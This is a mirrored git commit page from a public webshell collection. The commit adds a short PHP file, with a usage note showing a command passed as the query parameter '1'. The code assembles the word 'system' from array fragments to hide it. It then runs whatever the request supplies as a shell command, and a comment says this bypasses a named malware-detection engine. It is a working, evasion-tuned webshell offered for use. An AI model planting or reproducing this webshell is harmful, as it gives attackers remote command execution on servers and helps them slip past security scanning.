mirror of
https://github.com/tennc/webshell
synced 2024-11-12 22:47:15 +00:00
Create system2022-08-22-4.php
from: https://zhuanlan.zhihu.com/p/550150061 usage: xxx.php?1=whoami
This commit is contained in:
parent
a5b681ccf8
commit
43c3fd24a3
1 changed files with 6 additions and 0 deletions
6
php/system2022-08-22-4.php
Normal file
6
php/system2022-08-22-4.php
Normal file
|
@ -0,0 +1,6 @@
|
||||||
|
<?php
|
||||||
|
//ASRC伏魔引擎bypass
|
||||||
|
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
|
||||||
|
$a = join($result);
|
||||||
|
array_map($a,(array)$_REQUEST['1']);
|
||||||
|
?>
|
Loading…
Reference in a new issue